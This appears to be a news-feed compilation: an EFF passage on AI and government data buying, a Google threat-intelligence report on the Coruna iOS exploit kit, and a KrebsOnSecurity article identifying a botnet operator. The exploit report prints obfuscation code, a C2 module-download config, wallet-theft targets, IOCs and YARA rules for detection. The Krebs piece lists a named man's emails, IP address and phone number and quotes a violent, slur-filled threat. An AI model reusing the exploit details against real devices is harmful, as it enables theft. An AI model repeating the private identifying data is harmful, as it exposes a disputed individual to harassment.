    The companies know this. When speaking about the specific risk that AI poses to privacy, the CEO of Anthropic Dario Amodei said in an interview, “I actually do believe it is Congress’s job. If, for example, there are possibilities with domestic mass surveillance—the government buying of bulk data has been produced on Americans, locations, personal information, political affiliations, to build profiles, and it’s not possible to analyze all of that with AI—the fact that that is legal—that seems like the judicial interpretation of the Fourth Amendment has not caught up or the laws passed by Congress have not caught up.” 

    The example he cites here is a scarily realistic one—because it’s already happening. Customs and Border Protection has tapped into the online advertising world to buy data on Americans for surveillance purposes. Immigration and Customs Enforcement has been using a tool that maps millions of peoples’ devices based on purchased cell phone data. The Office of the Director of National Intelligence has proposed a centralized data broker marketplace to make it easier for intelligence agencies to buy commercially available data. Considering the government’s massive contracts with a bunch of companies that could do analysis, including Palantir, a company which does AI-enabled analysis of huge amounts of data, then the concerns are incredibly well founded. 

    But Congress is sadly neglecting its duties. For example, a bill that would close the loophole of the government buying personal information passed the House of Representatives in 2024, but the Senate stopped it.  And because Congress did not act, Americans must rely on a tech company CEO has to try to protect our privacy—or at least refuse to help the government violate it.

    Privacy in the digital age should be an easy bipartisan issue. Given that it’s wildly popular (71% of American adults are concerned about the government's use of their data and among adults that have heard of AI 70% have little to no trust in how companies use those products) you would think politicians would be leaping over each other to create the best legislation and companies would be promising us the most high-end privacy protecting features. Instead, for the time being, we are largely left adrift in a sea of constant surveillance, having to paddle our own life rafts.

    EFF has, and always will, fight for real and sustainable protections for our civil liberties including  a world where our privacy does not rest upon the whims of CEOs and back room deals with the surveillance state. 

    Coruna: The Mysterious Journey of a Powerful iOS Exploit Kit

    3 March 2026 at 15:00

    Introduction 

    Google Threat Intelligence Group (GTIG) has identified a new and powerful exploit kit targeting Apple iPhone models running iOS version 13.0 (released in September 2019) up to version 17.2.1 (released in December 2023). The exploit kit, named “Coruna” by its developers, contained five full iOS exploit chains and a total of 23 exploits. The core technical value of this exploit kit lies in its comprehensive collection of iOS exploits, with the most advanced ones using non-public exploitation techniques and mitigation bypasses. 

    The Coruna exploit kit provides another example of how sophisticated capabilities proliferate. Over the course of 2025, GTIG tracked its use in highly targeted operations initially conducted by a customer of a surveillance vendor, then observed its deployment in watering hole attacks targeting Ukrainian users by UNC6353, a suspected Russian espionage group. We then retrieved the complete exploit kit when it was later used in broad-scale campaigns by UNC6691, a financially motivated threat actor operating from China. How this proliferation occurred is unclear, but suggests an active market for "second hand" zero-day exploits. Beyond these identified exploits, multiple threat actors have now acquired advanced exploitation techniques that can be re-used and modified with newly identified vulnerabilities.

    Following our disclosure policy, we are sharing our research to raise awareness and advance security across the industry. We have also added all identified websites and domains to Safe Browsing to safeguard users from further exploitation. The Coruna exploit kit is not effective against the latest version of iOS, and iPhone users are strongly urged to update their devices to the latest version of iOS. In instances where an update is not possible, it is recommended that Lockdown Mode be enabled for enhanced security.

    Discovery Timeline

    discovery timeline

    Figure 1: Coruna iOS exploit kit timeline

    Initial Discovery: The Commercial Surveillance Vendor Role

    In February 2025, we captured parts of an iOS exploit chain used by a customer of a surveillance company. The exploits were integrated into a previously unseen JavaScript framework that used simple but unique JavaScript obfuscation techniques.

    [16, 22, 0, 69, 22, 17, 23, 12, 6, 17].map(x => {return String.fromCharCode(x ^ 101);}).join("")
    i.p1=(1111970405 ^ 1111966034);

    The JavaScript framework used these constructs to encode strings and integers

    The framework starts a fingerprinting module collecting a variety of data points to determine if the device is real and what specific iPhone model and iOS software version it is running. Based on the collected data, it loads the appropriate WebKit remote code execution (RCE) exploit, followed by a pointer authentication code (PAC) bypass as seen in Figure 2 from the deobfuscated JavaScript.

    Deobfuscated JavaScript of the Coruna exploit kit

    Figure 2: Deobfuscated JavaScript of the Coruna exploit kit

    At that time, we recovered the WebKit RCE delivered to a device running iOS 17.2 and determined it was CVE-2024-23222, a vulnerability previously identified as a zero-day that was addressed by Apple on Jan. 22, 2024 in iOS 17.3 without crediting any external researchers. Figure 3 shows the beginning of the RCE exploit exactly how it was delivered in-the-wild with our annotations.

    How the RCE exploit leveraging CVE-2024-23222 was delivered in the wild

    Figure 3: How the RCE exploit leveraging CVE-2024-23222 was delivered in the wild

    Government-Backed Attacker Usage

    In summer 2025, we noticed the same JavaScript framework hosted on cdn.uacounter[.]com, a website loaded as a hidden iFrame on many compromised Ukrainian websites, ranging from industrial equipment and retail tools to local services and ecommerce websites. The framework was only delivered to selected iPhone users from a specific geolocation.

    The framework was identical and delivered the same set of exploits. We collected WebKit RCEs, which included CVE-2024-23222, CVE-2022-48503, and CVE-2023-43000, before the server was shut down. We alerted and worked with CERT-UA to clean up all compromised websites.

    Full Exploit Chain Collection From Chinese Scam Websites

    At the end of the year, we identified the JavaScript framework on a very large set of fake Chinese websites mostly related to finance, dropping the exact same iOS exploit kit. The websites tried to convince users to visit the websites with iOS devices, as seen in Figure 4, taken from a fake WEEX crypto exchange website.

    Pop-up on a fake cryptocurrency exchange website trying to drive users to the exploits

    Figure 4: Pop-up on a fake cryptocurrency exchange website trying to drive users to the exploits

    Upon accessing these websites via an iOS device and regardless of their geolocation, a hidden iFrame is injected, delivering the exploit kit. As an example, Figure 5 shows the same CVE-2024-23222 exploit as it was found on 3v5w1km5gv[.]xyz.

    Screenshot of CVE-2024-23222 exploit recovered from a scam site

    Figure 5: Screenshot of CVE-2024-23222 exploit recovered from a scam site

    We retrieved all the obfuscated exploits, including ending payloads. Upon further analysis, we noticed an instance where the actor deployed the debug version of the exploit kit, leaving in the clear all of the exploits, including their internal code names. That’s when we learned that the exploit kit was likely named Coruna internally. In total, we collected a few hundred samples covering a total of five full iOS exploit chains. The exploit kit is able to target various iPhone models running iOS version 13.0 (released in September 2019) up to version 17.2.1 (released in December 2023).

    In the subsequent sections, we will provide a quick description of the framework, a breakdown of the exploit chains, and the associated implants we have captured. Our analysis of the collected data is ongoing, and we anticipate publishing additional technical specifications via new blog entries or root cause analyses (RCAs).

    The Coruna Exploit Kit

    The framework surrounding the exploit kit is extremely well engineered; the exploit pieces are all connected naturally and combined together using common utility and exploitation frameworks. The kit performs the following unique actions:

    • Bailing out if the device is in Lockdown Mode, or the user is in private browsing.

    • A unique and hard-coded cookie is used along the way to generate resource URLs.

    • Resources are referred to by a hash, which needs to be derived with the unique cookie using sha256(COOKIE + ID)[:40] to get their URL.

    • RCE and PAC bypasses are delivered unencrypted.

    The kit contains a binary loader to load the appropriate exploit chain post RCE within WebKit. In this case, binary payloads:

    • Have unique metadata indicating what they really are, what chips and iOS versions they support.

    • Are served from URLs that end with .min.js.

    • Are encrypted using ChaCha20 with a unique key per blob.

    • Are packaged in a custom file format starting with 0xf00dbeef as header.

    • Are compressed with the Lempel–Ziv–Welch (LZW) algorithm.

    Figure 6 shows what an infection of an iPhone XR running iOS 15.8.5 looks like from a networking point of view, with our annotation of the different parts when browsing one of these fake financial websites.

    Coruna exploit chain delivered on iOS 15.8.5

    Figure 6: Coruna exploit chain delivered on iOS 15.8.5

    The Exploits and Their Code Names

    The core technical value of this exploit kit lies in its comprehensive collection of iOS exploits. The exploits feature extensive documentation, including docstrings and comments authored in native English. The most advanced ones are using non-public exploitation techniques and mitigation bypasses. The following table provides a summary of our ongoing analysis regarding the various exploit chains; however, as the full investigation is still in progress, certain CVE associations may be subject to revision. There are in total 23 exploits covering versions from iOS 13 to iOS 17.2.1.

    Type

    Codename

    Targeted versions (inclusive)

    Fixed version

    CVE

    WebContent R/W

    buffout

    13 → 15.1.1

    15.2

    CVE-2021-30952

    WebContent R/W

    jacurutu

    15.2 → 15.5

    15.6

    CVE-2022-48503

    WebContent R/W

    bluebird

    15.6 → 16.1.2

    16.2

    No CVE

    WebContent R/W

    terrorbird

    16.2 → 16.5.1

    16.6

    CVE-2023-43000

    WebContent R/W

    cassowary

    16.6 → 17.2.1

    16.7.5, 17.3

    CVE-2024-23222

    WebContent PAC bypass

    breezy

    13 → 14.x

    ?

    No CVE

    WebContent PAC bypass

    breezy15

    15 → 16.2

    ?

    No CVE

    WebContent PAC bypass

    seedbell

    16.3 → 16.5.1

    ?

    No CVE

    WebContent PAC bypass

    seedbell_16_6

    16.6 → 16.7.12

    ?

    No CVE

    WebContent PAC bypass

    seedbell_17

    17 → 17.2.1

    ?

    No CVE

    WebContent sandbox escape

    IronLoader

    16.0 → 16.3.116.4.0 (<= A12)

    15.7.8, 16.5

    CVE-2023-32409

    WebContent sandbox escape

    NeuronLoader

    16.4.0 → 16.6.1 (A13-A16)

    17.0

    No CVE

    PE

    Neutron

    13.X

    14.2

    CVE-2020-27932

    PE (infoleak)

    Dynamo

    13.X

    14.2

    CVE-2020-27950

    PE

    Pendulum

    14 → 14.4.x

    14.7

    No CVE

    PE

    Photon

    14.5 → 15.7.6

    15.7.7, 16.5.1

    CVE-2023-32434

    PE

    Parallax

    16.4 → 16.7

    17.0

    CVE-2023-41974

    PE

    Gruber

    15.2 → 17.2.1

    16.7.6, 17.3

    No CVE

    PPL Bypass

    Quark

    13.X

    14.5

    No CVE

    PPL Bypass

    Gallium

    14.x

    15.7.8, 16.6

    CVE-2023-38606

    PPL Bypass

    Carbone

    15.0 → 16.7.6

    17.0

    No CVE

    PPL Bypass

    Sparrow

    17.0 → 17.3

    16.7.6, 17.4

    CVE-2024-23225

    PPL Bypass

    Rocket

    17.1 → 17.4

    16.7.8, 17.5

    CVE-2024-23296

    Table 1: Table with mapping CVE to code names

    Photon and Gallium are exploiting vulnerabilities that were also used as zero-days as part of Operation Triangulation, discovered by Kaspersky in 2023. The Coruna exploit kit also embeds reusable modules to ease the exploitation of the aforementioned vulnerabilities. For example, there is a module called rwx_allocator using multiple techniques to bypass various mitigations preventing allocation of RWX memory pages in userland. The kernel exploits are also embedding various internal modules allowing them to bypass kernel-based mitigations such as kernel-mode PAC.

    The Ending Payload

    At the end of the exploitation chain, a stager binary called PlasmaLoader (tracked by GTIG as PLASMAGRID), using com.apple.assistd as an identifier, facilitates communication with the kernel component established by the exploit. The loader is injecting itself into powerd, a daemon running as root on iOS.

    The injected payload doesn’t exhibit the usual capabilities that we would expect to see from a surveillance vendor, but instead steals financial information. The payload can decode QR codes from images on disk. It also has a module to analyze blobs of text to look for BIP39 word sequences or very specific keywords like “backup phrase” or “bank account.” If such text is found in Apple Memos it will be sent back to the C2.

    More importantly, the payload has the ability to collect and run additional modules remotely, with the configuration retrieved from http://<C2 URL>/details/show.html. The configuration, as well as the additional modules, are compressed as 7-ZIP archives protected with a unique hard-coded password. The configuration is encoded in JSON and simply contains a list of module names with their respective URL, hash and size.

    {
      "entries": [
        {
          "bundleId": "com.bitkeep.os",
          "url": "http://<C2URL>/details/f6lib.js",
          "sha256": "6eafd742f58db21fbaf5fd7636e6653446df04b4a5c9bca9104e5dfad34f547c",
          "size": 256832,
          "flags": {
            "do_not_close_after_run": true
          }
        }
    ...
      ]
    }

    As expected, most of all identified modules exhibit a uniform design; they are all placing function hooks for the purpose of exfiltrating cryptocurrency wallets or sensitive information from the following applications:

    • com.bitkeep.os
    • com.bitpie.wallet
    • coin98.crypto.finance.insights
    • org.toshi.distribution
    • exodus-movement.exodus
    • im.token.app
    • com.kyrd.krystal.ios
    • io.metamask.MetaMask
    • org.mytonwallet.app
    • app.phantom
    • com.skymavis.Genesis
    • com.solflare.mobile
    • com.global.wallet.ios
    • com.tonhub.app
    • com.jbig.tonkeeper
    • com.tronlink.hdwallet
    • com.sixdays.trust
    • com.uniswap.mobile

    All of these modules contain proper logging with sentences written in Chinese:

    <PlasmaLogger> %s[%d]: CorePayload 管理器初始化成功,尝试启动...

    This log string indicates the CorePayload Manager initialized successfully

    Some comments, such as the following one, also include emojis and are written in a way suggesting they might be LLM-generated.

    <PlasmaLogger> %s[%d]: [PLCoreHeartbeatMonitor] ✅ 心跳监控已启动 (端口=0x%x),等待 CorePayload 发送第一个心跳...

    Network communication is done over HTTPs with the collected data encrypted and POST’ed with AES using the SHA256 hash of a static string as key. Some of the HTTP requests contain additional HTTP headers such as sdkv or x-ts, followed by a timestamp. The implant contains a list of hard-coded C2s but has a fallback mechanism in case the servers do not respond. The implant embeds a custom domain generation algorithm (DGA) using the string “lazarus” as seed to generate a list of predictable domains. The domains will have 15 characters and use .xyz as TLD. The attackers use Google's public DNS resolver to validate if the domains are active.

    Conclusion

    Google has been a committed participant in the Pall Mall Process, designed to build consensus and progress toward limiting the harms from the spyware industry. Together, we are focused on developing international norms and frameworks to limit the misuse of these powerful technologies and protect human rights around the world. These efforts are built on earlier governmental actions, including steps taken by the US Government to limit government use of spyware, and a first-of-its-kind international commitment to similar efforts.

    Acknowledgements

    We would like to acknowledge and thank Google Project-Zero and Apple Security Engineering & Architecture team for their partnership throughout this investigation.

    Indicators of Compromise (IOCs)

    To assist the wider community in hunting and identifying activity outlined in this blog post, we have included IOCs in a free GTI Collection for registered users.

    File Indicators

    Hashes of the implant and its modules delivered from the crypto related websites.

    Implant

    bundleId

    SHA-256

    com.apple.assistd

    2a9d21ca07244932939c6c58699448f2147992c1f49cd3bc7d067bd92cb54f3a

    Modules

    bundleId

    SHA-256

    com.apple.springboard

    18394fcc096344e0730e49a0098970b1c53c137f679cff5c7ff8902e651cd8a3

    com.bitkeep.os

    6eafd742f58db21fbaf5fd7636e6653446df04b4a5c9bca9104e5dfad34f547c

    com.bitpie.wallet

    42cc02cecd65f22a3658354c5a5efa6a6ec3d716c7fbbcd12df1d1b077d2591b

    coin98.crypto.finance.insights

    0dff17e3aa12c4928273c70a2e0a6fff25d3e43c0d1b71056abad34a22b03495

    org.toshi.distribution

    05b5e4070b3b8a130b12ea96c5526b4615fcae121bb802b1a10c3a7a70f39901

    exodus-movement.exodus

    10bd8f2f8bb9595664bb9160fbc4136f1d796cb5705c551f7ab8b9b1e658085c

    im.token.app

    91d44c1f62fd863556aac0190cbef3b46abc4cbe880f80c580a1d258f0484c30

    com.kyrd.krystal.ios

    721b46b43b7084b98e51ab00606f08a6ccd30b23bef5e542088f0b5706a8f780

    io.metamask.MetaMask

    25a9b004cf61fb251c8d4024a8c7383a86cb30f60aa7d59ca53ce9460fcfb7de

    org.mytonwallet.app

    be28b40df919d3fa87ed49e51135a719bd0616c9ac346ea5f20095cb78031ed9

    app.phantom

    3c297829353778857edfeaed3ceeeca1bf8b60534f1979f7d442a0b03c56e541

    com.skymavis.Genesis

    499f6b1e012d9bc947eea8e23635dfe6464cd7c9d99eb11d5874bd7b613297b1

    com.solflare.mobile

    d517c3868c5e7808202f53fa78d827a308d94500ae9051db0a62e11f7852e802

    com.global.wallet.ios

    4dfcf5a71e5a8f27f748ac7fd7760dec0099ce338722215b4a5862b60c5b2bfd

    com.tonhub.app

    d371e3bed18ee355438b166bbf3bdaf2e7c6a3af8931181b9649020553b07e7a

    com.jbig.tonkeeper

    023e5fb71923cfa2088b9a48ad8566ff7ac92a99630add0629a5edf4679888de

    com.tronlink.hdwallet

    f218068ea943a511b230f2a99991f6d1fbc2ac0aec7c796b261e2a26744929ac

    com.sixdays.trust

    1fb9dedf1de81d387eff4bd5e747f730dd03c440157a66f20fdb5e95f64318c0

    com.uniswap.mobile

    4dc255504a6c3ea8714ccdc95cc04138dc6c92130887274c8582b4a96ebab4a8

    Network Indicators

    UNC6353 Indicators

    URL delivering Coruna exploit kit

    http://cdn[.]uacounter[.]com/stat[.]html

    UNC6691 Indicators

    URLs delivering Coruna exploit kit

    https://ai-scorepredict[.]com/static/analytics[.]html

    https://m[.]pc6[.]com/test/tuiliu/group[.]html

    http://ddus17[.]com/tuiliu/group[.]html

    https://goodcryptocurrency[.]top/details/group[.]html

    http://pepeairdrop01[.]com/static/analytics[.]html

    https://osec2[.]668ddf[.]cc/tuiliu/group[.]html

    https://pepeairdrop01[.]com/static/analytics[.]html

    https://ios[.]teegrom[.]top/tuiliu/group[.]html

    https://i[.]binaner[.]com/group[.]html

    https://ajskbnrs[.]xn--jor0b302fdhgwnccw8g[.]com/gogo/list[.]html

    https://sj9ioz3a7y89cy7[.]xyz/list[.]html

    https://65sse[.]668ddf[.]cc/tuiliu/group[.]html

    https://sadjd[.]mijieqi[.]cn/group[.]html

    https://mkkku[.]com/static/analytics[.]html

    https://dbgopaxl[.]com/static/goindex/tuiliu/group[.]html

    https://w2a315[.]tubeluck[.]com/static/goindex/tuiliu/group[.]html

    https://ose[.]668ddf[.]cc/tuiliu/group[.]html

    http://cryptocurrencyworld[.]top/details/group[.]html

    https://iphonex[.]mjdqw[.]cn/tuiliu/group[.]html

    http://goodcryptocurrency[.]top/details/group[.]html

    https://share[.]4u[.]game/group[.]html

    https://26a[.]online/group[.]html

    https://binancealliancesintro[.]com/group[.]html

    https://4u[.]game/group[.]html

    http://bestcryptocurrency[.]top/details/group[.]html

    https://b27[.]icu/group[.]html

    https://h4k[.]icu/group[.]html

    https://so5083[.]tubeluck[.]com/static/goindex/group[.]html

    https://seven7[.]vip/group[.]html

    https://y4w[.]icu/group[.]html

    https://7ff[.]online/group[.]html

    https://cy8[.]top/group[.]html

    https://7uspin[.]us/group[.]html

    https://seven7[.]to/group[.]html

    https://4kgame[.]us/group[.]html

    https://share[.]7p[.]game/group[.]html

    https://www[.]appstoreconn[.]com/xmweb/group[.]html

    https://k96[.]icu/group[.]html

    https://7fun[.]icu/group[.]html

    https://n49[.]top/group[.]html

    https://98a[.]online/group[.]html

    https://spin7[.]icu/group[.]html

    https://t7c[.]icu/group[.]html

    https://7p[.]game/group[.]html

    https://lddx3z2d72aa8i6[.]xyz/group[.]html

    https://anygg[.]liquorfight[.]com/88k4ez/group[.]html

    https://goanalytics[.]xyz/88k4ez/group[.]html

    http://land[.]77bingos[.]com/88k4ez/group[.]html

    https://land[.]bingo777[.]now/88k4ez/group[.]html

    http://land[.]bingo777[.]now/88k4ez/group[.]html

    http://land[.]777bingos[.]xyz/88k4ez/group[.]html

    https://btrank[.]top/tuiliu/group[.]html

    https://dd9l7e6ghme8pbk[.]xyz/group[.]html

    https://res54allb[.]xn--xkrsa0078bd6d[.]com/group[.]html

    https://fxrhcnfwxes90q[.]xyz/group[.]html

    https://kanav[.]blog/group[.]html

    https://3v5w1km5gv[.]xyz/group[.]html

    PLASMAGRID C2 domains

    vvri8ocl4t3k8n6.xyz

    rlau616jc7a7f7i.xyz

    ol67el6pxg03ad7.xyz

    6zvjeulzaw5c0mv.xyz

    ztvnhmhm4zj95w3.xyz

    v2gmupm7o4zihc3.xyz

    pen0axt0u476duw.xyz

    hfteigt3kt0sf3z.xyz

    xfal48cf0ies7ew.xyz

    yvgy29glwf72qnl.xyz

    lk4x6x2ejxaw2br.xyz

    2s3b3rknfqtwwpo.xyz

    xjslbdt9jdijn15.xyz

    hui4tbh9uv9x4yi.xyz

    xittgveqaufogve.xyz

    xmmfrkq9oat1daq.xyz

    lsnngjyu9x6vcg0.xyz

    gdvynopz3pa0tik.xyz

    o08h5rhu2lu1x0q.xyz

    zcjdlb5ubkhy41u.xyz

    8fn4957c5g986jp.xyz

    uawwydy3qas6ykv.xyz

    sf2bisx5nhdkygn3l.xyz

    roy2tlop2u.xyz

    gqjs3ra34lyuvzb.xyz

    eg2bjo5x5r8yjb5.xyz

    b38w09ecdejfqsf.xyz

    YARA Rules

    rule G_Hunting_Exploit_MapJoinEncoder_1 {
    	meta:
    		author = "Google Threat Intelligence Group (GTIG)"
    	strings:
    		$s1 = /\[[^\]]+\]\.map\(\w\s*=>.{0,15}String\.fromCharCode\(\w\s*\^\s*(\d+)\).{0,15}\.join\(""\)/
    		$fp1 = "bot|googlebot|crawler|spider|robot|crawling"
    	condition:
    		1 of ($s*) and not any of ($fp*)
    }
    rule G_Backdoor_PLASMAGRID_Strings_1 {
    	meta:
    		author = "Google Threat Intelligence Group (GTIG)"
    	strings:
    		$ = "com.plasma.appruntime.appdiscovery"
    		$ = "com.plasma.appruntime.downloadmanager"
    		$ = "com.plasma.appruntime.hotupdatemanager"
    		$ = "com.plasma.appruntime.modulestore"
    		$ = "com.plasma.appruntime.netconfig"
    		$ = "com.plasma.bundlemapper"
    		$ = "com.plasma.event.upload.serial"
    		$ = "com.plasma.notes.monitor"
    		$ = "com.plasma.photomonitor"
    		$ = "com.plasma.PLProcessStateDetector"
    		$ = "plasma_heartbeat_monitor"
    		$ = "plasma_injection_dispatcher"
    		$ = "plasma_ipc_processor"
    		$ = "plasma_%@.jpg"
    		$ = "/var/mobile/Library/Preferences/com.plasma.photomonitor.plist"
    		$ = "helion_ipc_handler"
    		$ = "PLInjectionStateInfo"
    		$ = "PLExploitationInterface"
    	condition:
    		1 of them
    }

    Who is the Kimwolf Botmaster “Dort”?

    28 February 2026 at 13:01

    In early January 2026, KrebsOnSecurity revealed how a security researcher disclosed a vulnerability that was used to build Kimwolf, the world’s largest and most disruptive botnet. Since then, the person in control of Kimwolf — who goes by the handle “Dort” — has coordinated a barrage of distributed denial-of-service (DDoS), doxing and email flooding attacks against the researcher and this author, and more recently caused a SWAT team to be sent to the researcher’s home. This post examines what is knowable about Dort based on public information.

    A public “dox” created in 2020 asserted Dort was a teenager from Canada (DOB August 2003) who used the aliases “CPacket” and “M1ce.” A search on the username CPacket at the open source intelligence platform OSINT Industries finds a GitHub account under the names Dort and CPacket that was created in 2017 using the email address jay.miner232@gmail.com.

    Image: osint.industries.

    The cyber intelligence firm Intel 471 says jay.miner232@gmail.com was used between 2015 and 2019 to create accounts at multiple cybercrime forums, including Nulled (username “Uubuntuu”) and Cracked (user “Dorted”); Intel 471 reports that both of these accounts were created from the same Internet address at Rogers Canada (99.241.112.24).

    Dort was an extremely active player in the Microsoft game Minecraft who gained notoriety for their “Dortware” software that helped players cheat. But somewhere along the way, Dort graduated from hacking Minecraft games to enabling far more serious crimes.

    Dort also used the nickname DortDev, an identity that was active in March 2022 on the chat server for the prolific cybercrime group known as LAPSUS$. Dort peddled a service for registering temporary email addresses, as well as “Dortsolver,” code that could bypass various CAPTCHA services designed to prevent automated account abuse. Both of these offerings were advertised in 2022 on SIM Land, a Telegram channel dedicated to SIM-swapping and account takeover activity.

    The cyber intelligence firm Flashpoint indexed 2022 posts on SIM Land by Dort that show this person developed the disposable email and CAPTCHA bypass services with the help of another hacker who went by the handle “Qoft.”

    “I legit just work with Jacob,” Qoft said in 2022 in reply to another user, referring to their exclusive business partner Dort. In the same conversation, Qoft bragged that the two had stolen more than $250,000 worth of Microsoft Xbox Game Pass accounts by developing a program that mass-created Game Pass identities using stolen payment card data.

    Who is the Jacob that Qoft referred to as their business partner? The breach tracking service Constella Intelligence finds the password used by jay.miner232@gmail.com was reused by just one other email address: jacobbutler803@gmail.com. Recall that the 2020 dox of Dort said their date of birth was August 2003 (8/03).

    Searching this email address at DomainTools.com reveals it was used in 2015 to register several Minecraft-themed domains, all assigned to a Jacob Butler in Ottawa, Canada and to the Ottawa phone number 613-909-9727.

    Constella Intelligence finds jacobbutler803@gmail.com was used to register an account on the hacker forum Nulled in 2016, as well as the account name “M1CE” on Minecraft. Pivoting off the password used by their Nulled account shows it was shared by the email addresses j.a.y.m.iner232@gmail.com and jbutl3@ocdsb.ca, the latter being an address at a domain for the Ottawa-Carelton District School Board.

    Data indexed by the breach tracking service Spycloud suggests that at one point Jacob Butler shared a computer with his mother and a sibling, which might explain why their email accounts were connected to the password “jacobsplugs.” Neither Jacob nor any of the other Butler household members responded to requests for comment.

    The open source intelligence service Epieos finds jacobbutler803@gmail.com created the GitHub account “MemeClient.” Meanwhile, Flashpoint indexed a deleted anonymous Pastebin.com post from 2017 declaring that MemeClient was the creation of a user named CPacket — one of Dort’s early monikers.

    Why is Dort so mad? On January 2, KrebsOnSecurity published The Kimwolf Botnet is Stalking Your Local Network, which explored research into the botnet by Benjamin Brundage, founder of the proxy tracking service Synthient. Brundage figured out that the Kimwolf botmasters were exploiting a little-known weakness in residential proxy services to infect poorly-defended devices — like TV boxes and digital photo frames — plugged into the internal, private networks of proxy endpoints.

    By the time that story went live, most of the vulnerable proxy providers had been notified by Brundage and had fixed the weaknesses in their systems. That vulnerability remediation process massively slowed Kimwolf’s ability to spread, and within hours of the story’s publication Dort created a Discord server in my name that began publishing personal information about and violent threats against Brundage, Yours Truly, and others.

    Dort and friends incriminating themselves by planning swatting attacks in a public Discord server.

    Last week, Dort and friends used that same Discord server (then named “Krebs’s Koinbase Kallers”) to threaten a swatting attack against Brundage, again posting his home address and personal information. Brundage told KrebsOnSecurity that local police officers subsequently visited his home in response to a swatting hoax which occurred around the same time that another member of the server posted a door emoji and taunted Brundage further.

    Dort, using the alias “Meow,” taunts Synthient founder Ben Brundage with a picture of a door.

    Someone on the server then linked to a cringeworthy (and NSFW) new Soundcloud diss track recorded by the user DortDev that included a stickied message from Dort saying, “Ur dead nigga. u better watch ur fucking back. sleep with one eye open. bitch.”

    “It’s a pretty hefty penny for a new front door,” the diss track intoned. “If his head doesn’t get blown off by SWAT officers. What’s it like not having a front door?”

    With any luck, Dort will soon be able to tell us all exactly what it’s like.

    Update, 10:29 a.m.: Jacob Butler responded to requests for comment, speaking with KrebsOnSecurity briefly via telephone. Butler said he didn’t notice earlier requests for comment because he hasn’t really been online since 2021, after his home was swatted multiple times. He acknowledged making and distributing a Minecraft cheat long ago, but said he hasn’t played the game in years and was not involved in Dortsolver or any other activity attributed to the Dort nickname after 2021.

    “It was a really old cheat and I don’t remember the name of it,” Butler said of his Minecraft modification. “I’m very stressed, man. I don’t know if people are going to swat me again or what. After that, I pretty much walked away from everything, logged off and said fuck that. I don’t go online anymore. I don’t know why people would still be going after me, to be completely honest.”

    When asked what he does for a living, Butler said he mostly stays home and helps his mom around the house because he struggles with autism and social interaction. He maintains that someone must have compromised one or more of his old accounts and is impersonating him online as Dort.

    “Someone is actually probably impersonating me, and now I’m really worried,” Butler said. “This is making me relive everything.”

    But there are issues with Butler’s timeline. For example, Jacob’s voice in our phone conversation was remarkably similar to the Jacob/Dort whose voice can be heard in this Sept. 2022 Clash of Code competition between Dort and another coder (Dort lost). At around 6 minutes and 10 seconds into the recording, Dort launches into a cursing tirade that mirrors the stream of profanity in the diss rap that Dortdev posted threatening Brundage. Dort can be heard again at around 16 minutes; at around 26:00, Dort threatens to swat his opponent.

    Butler said the voice of Dort is not his, exactly, but rather that of an impersonator who had likely cloned his voice.

    “I would like to clarify that was absolutely not me,” Butler said. “There must be someone using a voice changer. Or something of the sorts. Because people were cloning my voice before and sending audio clips of ‘me’ saying outrageous stuff.”

    Further reading:

    Jan. 8, 2026: Who Benefited from the Aisuru and Kimwolf Botnets?

    Jan. 20, 2026: Kimwolf Botnet Lurking in Corporate, Govt. Networks

    Jan. 26, 2026: Who Operates the Badbox 2.0 Botnet?

    Feb. 11, 2026: Kimwolf Botnet Swamps Anonymity Network I2P

    Mar. 19, 2026: Feds Disrupt IoT Botnets Behind Huge DDoS Attacks

    ❌